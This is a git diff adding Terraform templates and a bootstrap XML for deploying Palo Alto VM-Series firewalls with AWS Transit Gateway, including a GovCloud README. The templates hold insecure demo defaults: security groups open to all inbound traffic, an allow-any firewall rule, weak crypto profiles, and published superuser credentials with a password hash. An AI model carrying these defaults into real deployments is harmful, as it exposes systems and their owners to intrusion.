diff --git a/aws/tgw_2fw_vpc_insertion/images/readme.md b/aws/tgw_2fw_vpc_insertion/images/readme.md
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/images/readme.md
@@ -0,0 +1 @@
+
diff --git a/aws/tgw_2fw_vpc_insertion/modules/vm-series/main.tf b/aws/tgw_2fw_vpc_insertion/modules/vm-series/main.tf
new file mode 100644
index 00000000..3e71a6d1
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/modules/vm-series/main.tf
@@ -0,0 +1,166 @@
+variable name {
+  description = "firewall instance name"
+}
+
+variable untrust_subnet_id {}
+variable untrust_security_group_id {}
+variable untrustfwip {}
+
+variable trust_subnet_id {}
+variable trust_security_group_id {}
+variable trustfwip {}
+
+variable management_subnet_id {}
+variable management_security_group_id {}
+
+variable bootstrap_profile {
+  default = ""
+}
+
+variable bootstrap_bucket {}
+
+variable tgw_id {}
+
+variable aws_region {}
+variable aws_key {}
+
+variable instance_type {}
+
+variable ngfw_license_type {}
+
+variable ngfw_version {
+  default = "8.1"
+}
+
+variable "license_type_map" {
+  type = "map"
+
+  default = {
+    "byol"  = "6njl1pau431dv1qxipg63mvah"
+    "payg1" = "6kxdw3bbmdeda3o6i1ggqt4km"
+    "payg2" = "806j2of0qy5osgjjixq9gqc6g"
+  }
+}
+
+data "aws_ami" "panw_ngfw" {
+  most_recent = true
+  owners = ["aws-marketplace"]
+  filter {
+    name   = "owner-alias"
+    values = ["aws-marketplace"]
+  }
+
+  filter {
+    name   = "product-code"
+    values = ["${var.license_type_map[var.ngfw_license_type]}"]
+  }
+
+  filter {
+    name   = "name"
+    values = ["PA-VM-AWS-${var.ngfw_version}*"]
+  }
+}
+
+data "aws_region" "current" {
+  name = "${var.aws_region}"
+}
+
+resource "aws_network_interface" "eni-management" {
+  subnet_id         = "${var.management_subnet_id}"
+  security_groups   = ["${var.management_security_group_id}"]
+  source_dest_check = true
+
+  tags {
+    Name = "eni_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-trust" {
+  subnet_id         = "${var.trust_subnet_id}"
+  private_ips       = ["${var.trustfwip}"]
+  security_groups   = ["${var.trust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_trust"
+  }
+}
+
+output "eni-trust" {
+  value = "${aws_network_interface.eni-trust.id}"
+}
+
+
+resource "aws_eip" "eip-management" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-management.id}"
+
+  tags {
+    Name = "eip_${var.name}_management"
+  }
+}
+
+resource "aws_network_interface" "eni-untrust" {
+  subnet_id         = "${var.untrust_subnet_id}"
+  private_ips       = ["${var.untrustfwip}"]
+  security_groups   = ["${var.untrust_security_group_id}"]
+  source_dest_check = false
+
+  tags {
+    Name = "eni_${var.name}_untrust"
+  }
+}
+
+
+resource "aws_eip" "eip-untrust" {
+  vpc               = true
+  network_interface = "${aws_network_interface.eni-untrust.id}"
+
+  tags {
+    Name = "eip_${var.name}_untrust"
+  }
+}
+
+resource "aws_instance" "instance-ngfw" {
+  disable_api_termination              = false
+  instance_initiated_shutdown_behavior = "stop"
+  iam_instance_profile                 = "${var.bootstrap_profile}"
+  user_data                            = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_bucket)))}"
+
+  ebs_optimized = true
+  ami           = "${data.aws_ami.panw_ngfw.image_id}"
+  instance_type = "${var.instance_type}"
+  key_name      = "${var.aws_key}"
+
+  monitoring = false
+  
+  root_block_device {
+    delete_on_termination = "true"
+  }
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.eni-management.id}"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.eni-untrust.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.eni-trust.id}"
+  }
+
+  tags {
+    Name = "${var.name}"
+  }
+}
+
+output "eip_untrust" {
+  value = "${aws_eip.eip-untrust.public_ip}"
+}
+
+output "eip_mgmt" {
+  value = "${aws_eip.eip-management.public_ip}"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/modules/vm-spoke/main.tf b/aws/tgw_2fw_vpc_insertion/modules/vm-spoke/main.tf
new file mode 100644
index 00000000..2dc08e30
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/modules/vm-spoke/main.tf
@@ -0,0 +1,177 @@
+variable vpc_spoke_cidr {}
+variable vpc_spoke_subnet_cidr {}
+variable vpc_spoke_subnet2_cidr {}
+variable aws_tgw_id {}
+variable aws_tgw_security_rtb_id {}
+variable aws_tgw_spoke_rtb_id {}
+variable pemkey {}
+variable serverip {}
+variable server2ip {}
+variable servername {}
+variable server2name {}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC
+#************************************************************************************
+resource "aws_vpc" "vpc_spoke" {
+  cidr_block = "${var.vpc_spoke_cidr}"
+
+  tags {
+    Name = "vpc_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC SUBNETS
+#************************************************************************************
+data "aws_availability_zones" "available" {}
+
+resource "aws_subnet" "primary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "vpc_spokeA_${var.vpc_spoke_subnet_cidr}"
+  }
+}
+
+resource "aws_subnet" "secondary" {
+  vpc_id            = "${aws_vpc.vpc_spoke.id}"
+  cidr_block        = "${var.vpc_spoke_subnet2_cidr}"
+  availability_zone = "${data.aws_availability_zones.available.names[1]}"
+
+  tags {
+    Name = "vpc_spokeB_${var.vpc_spoke_subnet2_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# CREATE SPOKE-VPC SUBNET ROUTE TABLE
+#************************************************************************************
+resource "aws_route" "vpc_spoke_route_1" {
+  route_table_id         = "${aws_vpc.vpc_spoke.default_route_table_id}"
+  destination_cidr_block = "0.0.0.0/0"
+  transit_gateway_id     = "${var.aws_tgw_id}"
+}
+
+
+#************************************************************************************
+# CREATE NSGs & NSG RULES FOR SPOKE-VM ENIs
+#************************************************************************************
+resource "aws_security_group" "server_sg" {
+  name        = "server_sg"
+  description = "Allow select inbound traffic"
+  vpc_id      = "${aws_vpc.vpc_spoke.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_ingress" {
+  type        = "ingress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+resource "aws_security_group_rule" "allow_server_sg_egress" {
+  type        = "egress"
+  from_port   = 0
+  to_port     = 0
+  protocol    = "-1"
+  cidr_blocks = ["0.0.0.0/0"]
+
+  security_group_id = "${aws_security_group.server_sg.id}"
+}
+
+
+#************************************************************************************
+# CREATE TGW ATTACHMENT FOR SPOKE-VPC
+#************************************************************************************
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_spoke_attachment" {
+  vpc_id                                          = "${aws_vpc.vpc_spoke.id}"
+  subnet_ids                                      = ["${aws_subnet.primary.id}", "${aws_subnet.secondary.id}"]
+  transit_gateway_id                              = "${var.aws_tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_spoke_${var.vpc_spoke_cidr}"
+  }
+}
+
+
+#************************************************************************************
+# ASSOCIATE TGW ROUTE TABLE W/ SPOKE ATTACHMENT (route table created in create_tgw.tf)
+#************************************************************************************
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_spoke_1" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_spoke_rtb_id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_propagation" "route_table_propagation" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_spoke_attachment.id}"
+  transit_gateway_route_table_id = "${var.aws_tgw_security_rtb_id}"
+}
+
+
+#************************************************************************************
+# CREATE SPOKE VMs
+#************************************************************************************
+data "aws_ami" "ubuntu" {
+  most_recent = true
+
+  filter {
+    name   = "name"
+    values = ["ubuntu/images/hvm-ssd/ubuntu-trusty-14.04-amd64-server-*"]
+  }
+
+  filter {
+    name   = "virtualization-type"
+    values = ["hvm"]
+  }
+
+  owners = ["099720109477"] # Canonical
+}
+
+resource "aws_instance" "web" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.primary.id}"
+  private_ip      = "${var.serverip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.servername}"
+  }
+}
+
+resource "aws_instance" "web2" {
+  ami             = "${data.aws_ami.ubuntu.id}"
+  instance_type   = "t2.micro"
+  key_name        = "${var.pemkey}"
+  subnet_id       = "${aws_subnet.secondary.id}"
+  private_ip      = "${var.server2ip}"
+  security_groups = ["${aws_security_group.server_sg.id}"]
+
+  tags = {
+    Name = "${var.server2name}"
+  }
+}
+
+
+#************************************************************************************
+# OUTPUT SPOKE-VPC IDs
+#************************************************************************************
+output "vpc_id" {
+  value = "${aws_vpc.vpc_spoke.id}"
+}
+
+output "subnet_id" {
+  value = "${aws_subnet.primary.id}"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/providers.tf b/aws/tgw_2fw_vpc_insertion/providers.tf
new file mode 100644
index 00000000..89c5aab2
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/providers.tf
@@ -0,0 +1,4 @@
+provider "aws" {
+  version    = ">= 1.0.0"
+  region     = "${var.aws_region}"
+}
diff --git a/aws/tgw_2fw_vpc_insertion/variables.tf b/aws/tgw_2fw_vpc_insertion/variables.tf
new file mode 100644
index 00000000..e8b5060d
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/variables.tf
@@ -0,0 +1,169 @@
+#************************************************************************************
+# SET REGION AND SSH KEY FOR EC2 INSTANCES
+#************************************************************************************
+variable aws_region {
+  description = "AWS Region for deployment"
+  default     = "us-east-1"
+}
+variable aws_key {
+  description = "Enter your AWS EC2 key pair"
+  # default     = "my_aws_ec2_key_pair"
+}
+variable management_cidr {
+  description = "Source IP applied to management NSG"
+  # default     = "0.0.0.0/0"
+}
+
+variable ngfw_license_type {
+  description = "Select VM-Series license type (byol, payg1, payg2)"
+  # default = "byol"
+  # default = "payg1"
+  # default = "payg2"
+}
+
+variable instance_type {
+  description = "Select VM-Series Size"
+  default = "m4.2xlarge"
+}
+
+#************************************************************************************
+# S3 STORAGE BUCKETS FOR FW BOOTSTRAPPING (DO NOT CREATE BEFORE DEPLOYMENT)
+#************************************************************************************
+variable bootstrap_s3bucket1_create {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-fw1-bootstrap" // 30-CHARATER RANDOM STRING IS ADDED TO THIS BUCKET NAME
+}
+
+variable bootstrap_s3bucket2_create {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
+  default     = "tgw-fw2-bootstrap" // 30-CHARACTER RANDOM STRING IS ADDED TO THIS BUCKET NAME
+}
+
+#************************************************************************************
+# SECURITY VPC CIDRS
+#************************************************************************************
+variable vpc_security_cidr {
+  description = "Security VPC CIDR"
+  default     = "192.168.0.0/16"
+}
+
+variable vpc_security_subnet_mgmt_1 {
+  description = "Mgmt Subnet CIDR-AZ1"
+  default     = "192.168.100.0/24"
+}
+variable vpc_security_subnet_mgmt_2 {
+  description = "Mgmt Subnet CIDR-AZ2"
+  default     = "192.168.101.0/24"
+}
+variable vpc_security_subnet_public_1 {
+  description = "Public Subnet CIDR-AZ1"
+  default     = "192.168.10.0/24"
+}
+variable vpc_security_subnet_public_2 {
+  description = "Public Subnet CIDR-AZ2"
+  default     = "192.168.11.0/24"
+}
+variable vpc_security_subnet_private_1 {
+  description = "Trust Subnet CIDR-AZ1"
+  default     = "192.168.20.0/24"
+}
+variable vpc_security_subnet_private_2 {
+  description = "Trust Subnet CIDR-AZ2"
+  default     = "192.168.21.0/24"
+}
+variable vpc_security_subnet_tgw_1 {
+  description = "TGW Subnet CIDR-AZ1"
+  default     = "192.168.30.0/24"
+}
+variable vpc_security_subnet_tgw_2 {
+  description = "TGW Subnet CIDR-AZ2"
+  default     = "192.168.31.0/24"
+}
+
+#************************************************************************************
+# FW ENI IP ADDRESSES
+#************************************************************************************
+variable fw_ip_subnet_public_1 {
+  description = "FW1 Public Subnet IP Address-AZ1"
+  default     = "192.168.10.4"
+}
+variable fw_ip_subnet_public_2 {
+  description = "FW2 Public Subnet IP Address-AZ2"
+  default     = "192.168.11.4"
+}
+variable fw_ip_subnet_private_1 {
+  description = "FW1 Private Subnet IP Address-AZ1"
+  default     = "192.168.20.4"
+}
+variable fw_ip_subnet_private_2 {
+  description = "FW2 Private Subnet IP Address-AZ2"
+  default     = "192.168.21.4"
+}
+
+
+#************************************************************************************
+# SPOKE-1 VPC CIDRS
+#************************************************************************************
+variable spoke1_cidr {
+  description = "CIDR Address for Spoke1 VPC"
+  default     = "10.1.0.0/16"
+}
+
+variable spoke1_subnet {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.0.0/24"
+}
+
+variable spoke1_subnet2 {
+  description = "CIDR Address for Spoke1 Subnet"
+  default     = "10.1.1.0/24"
+}
+
+
+#************************************************************************************
+# SPOKE-2 VPC CIDRS
+#************************************************************************************
+variable spoke2_cidr {
+  description = "CIDR Address for Spoke2 VPC"
+  default     = "10.2.0.0/16"
+}
+
+variable spoke2_subnet {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.0.0/24"
+}
+
+variable spoke2_subnet2 {
+  description = "CIDR Address for Spoke2 Subnet"
+  default     = "10.2.1.0/24"
+}
+
+
+#************************************************************************************
+# SPOKE-1 VM IP ADDRESSES
+#************************************************************************************
+variable spoke1_server {
+  description = "Server Address for Spoke1 Server"
+  default     = "10.1.0.4"
+}
+variable spoke1_server2 {
+  description = "Server Address for Spoke1 Server2"
+  default     = "10.1.1.4"
+}
+
+#************************************************************************************
+# SPOKE-2 VM IP ADDRESSES
+#************************************************************************************
+variable spoke2_server {
+  description = "Server Address for Spoke2 Server"
+  default     = "10.2.0.4"
+}
+variable spoke2_server2 {
+  description = "Server Address for Spoke2 Server2"
+  default     = "10.2.1.4"
+}
+variable all_spoke_cidr {
+  description = "CIDR to cover Spoke1 and Spoke2-Used in FROM-TGW AWS Route Table"
+  default     = "10.0.0.0/8"
+}
+
diff --git a/aws/tgw_inbound_asg-GovCloud/README.md b/aws/tgw_inbound_asg-GovCloud/README.md
new file mode 100644
index 00000000..acb6feb2
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/README.md
@@ -0,0 +1,42 @@
+## VM-Series Autoscaling for Inbound TGW
+# The GovCloud Version
+# Warning: Not completely functional
+
+This build is a port of existing work to AWS GovCloud. The original may be found here: https://github.com/wwce/terraform/tree/master/aws/tgw_inbound_asg
+
+This build is an adaptation of the [AWS VM-Series Autoscaling 2.0](https://docs.paloaltonetworks.com/vm-series/8-1/vm-series-deployment/set-up-the-vm-series-firewall-on-aws/auto-scale-vm-series-firewalls-with-the-amazon-elb/autoscale-template-version2_0.html) to work function with AWS Transit Gateway.
+
+### Overview
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/aws/tgw_inbound_asg/diagram.png">
+</p>
+
+### Requirements
+* Existing Transit Gateway
+* Existing Transit Gateway route table for the Security-VPC attachment
+* EC2 Key Pair for deployment region
+* UN/PW: **pandemo** / **demopassword**
+
+
+### How to Deploy
+1.  Open **variables.tf** in a text editor. 
+2.  Uncomment default values and add correct value for following variables: 
+    * **fw_ami**
+         * Firewall AMI for AWS Region, SKU, & PAN-OS version.
+    * **fw_sg_source**
+         * Source prefix to apply to VM-Series mgmt. interface
+    * **tgw_id** 
+         * Existing Transit Gateway ID
+    * **tgw_rtb_id** 
+         * Existing Transit Gateway Route Table ID
+3.  Save **variables.tf**
+4.  BYOL ONLY 
+    * If you want to license the VM-Series on creation, copy and paste your Auth Code into the /bootstrap/authcodes file.  The Auth Code must be registered with your Palo Alto Networks support account before proceeding.
+Before proceeding, make sure you have accepted and subscribed to the VM-Series software in the AWS Marketplace. 
+
+## Notes
+1. us-gov-west was used for deployment testing. It should work in other regions provided the underlying features are available.
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes
new file mode 100644
index 00000000..8d1c8b69
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
diff --git a/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..e0db5fed
--- /dev/null
+++ b/aws/tgw_inbound_asg-GovCloud/bootstrap_files/bootstrap.xml
@@ -0,0 +1,439 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>*****</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5</public-key>
+      </entry>
+      <entry name="pandemo">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$hqikhfkl$1Z1t7bvONQJM1IAh0erho1</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <interface-management-profile>mgmt</interface-management-profile>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <interface-management-profile>mgmt</interface-management-profile>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="mgmt">
+              <ssh>yes</ssh>
+              <ping>yes</ping>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+              </bgp>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+          </entry>
+        </virtual-router>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <ip-address>192.168.10.16</ip-address>
+          <netmask>255.255.255.0</netmask>
+          <default-gateway>192.168.10.1</default-gateway>
+          <hostname>PA-VM</hostname>
+          <server-verification>no</server-verification>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>no</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcG9tWXUwNjNjQ2ViamNpd2R3czRyNjluUWNDcXoyQkkvMHR4WjA4RElzQkw3WFNqUmlSRCtvU3pDN1E4bTFOZ1dFcTN5ajRJTlI4Sm01WnZjcDJpRmVCbWdXTmZWc2hFQ1FwU2lMTmJXMFE5L05NRkNiZG9WandRUFhhRmhHTFQ1M2RiR3BzUFc4bE44NnRJam01cCsrYlR5T2tuUzFSUlJMWnNoYjZpSXRxbXZoRVdNRnZ4NG1CdnVxTHVqSHRaN1JhSksveTAxUkxGMXZCRE1aN01mbnVObGgwVXM1cTIwT2k0NjlLNzBrbi81bnF4YzZIWGpPRnRiYUZtUnhwK0FXbGs0a0x4YTdrTE0wNjMxRUgyUlZzY1Q5Q2kzYURVK2JPKzI0dzRGK2Y5U05NeFQzOW1TeFpmWXlMWHlqSGdWeE93QjZuRW5IUUcxSjdCRldHa1QgbXJtLWVhc3R1czEta2V5</public-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+          <aws-cloudwatch>
+            <enabled>yes</enabled>
+            <name>security-i-secur-Publi-MBTK5R0EMJSF_ASG_us-east-1a</name>
+          </aws-cloudwatch>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="Untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="Trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="policy1">
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules/>
+            </nat>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="AWS-NAT-UNTRUST">
+              <ip-netmask>10.255.1.4</ip-netmask>
+              <description>UNTRUST-IP-address</description>
+            </entry>
+          </address>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
